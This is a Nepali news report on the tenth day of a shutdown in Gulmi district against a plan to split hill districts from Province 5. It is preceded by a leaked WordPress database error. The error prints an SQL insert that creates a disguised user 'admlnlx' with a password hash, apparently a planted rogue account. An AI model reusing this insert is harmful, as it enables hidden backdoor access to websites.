WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B31yN7zvV1fHrdRmIl3UiaPlTjZ/DJ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 05:12:27', '', 'admlnlx', 'admlnlx')
तम्घास (गुल्मी), मंसिर २४ –
सरकारले संसद्मा संशोधन प्रस्ताव दर्ता गरी प्रदेश नं ५ बाट गुल्मीलगायत पहाडी जिल्लालाई टुक्र्याउन लागेको विरोधमा अनिश्चितकालीन गुल्मी बन्दको दशौँ दिन गुल्मीको जनजीवन थप प्रभावित बन्दै गएको छ ।
बन्दका कारण जिल्लाका सम्पूर्ण बजार, उद्योग तथा कलकारखानालगायत यातायात सेवा ठप्प हुँदा सर्वसाधारणले थप सास्ती भोग्न बाध्य भएका छन् । आन्दोलनकर्ताले दिनहुँ जिल्ला प्रशासन र जिविसको कार्यालय अगाडि धर्ना दिने र फरक फरक प्रकृतिका प्रदर्शन गरेर विरोध जनाउँदै आएका छन् । आन्दोलनको दशौँ दिन शुक्रबार संयुक्त आन्दोलन परिचालन सङ्घर्ष समितिको आयोजनामा जिल्लाका आठवटा ग्रामीण क्षेत्रका मुख्य मुख्य स्थानमा विरोध सभाको आयोजनासमेत गरिएको छ ।
संसद्मा दर्ता गरिएको संशोधन प्रस्ताव फिर्ता नगर्दासम्म गुल्मी बन्दको कार्यक्रम यथावत् राख्दै धर्ना र प्रदर्शनलाई अझ सशक्त बनाउँदै लैजाने संयुक्त आन्दोलन परिचालन सङ्घर्ष समितिका संयोजक भुवनप्रसाद श्रेष्ठले बताउनुभएको छ । – रासस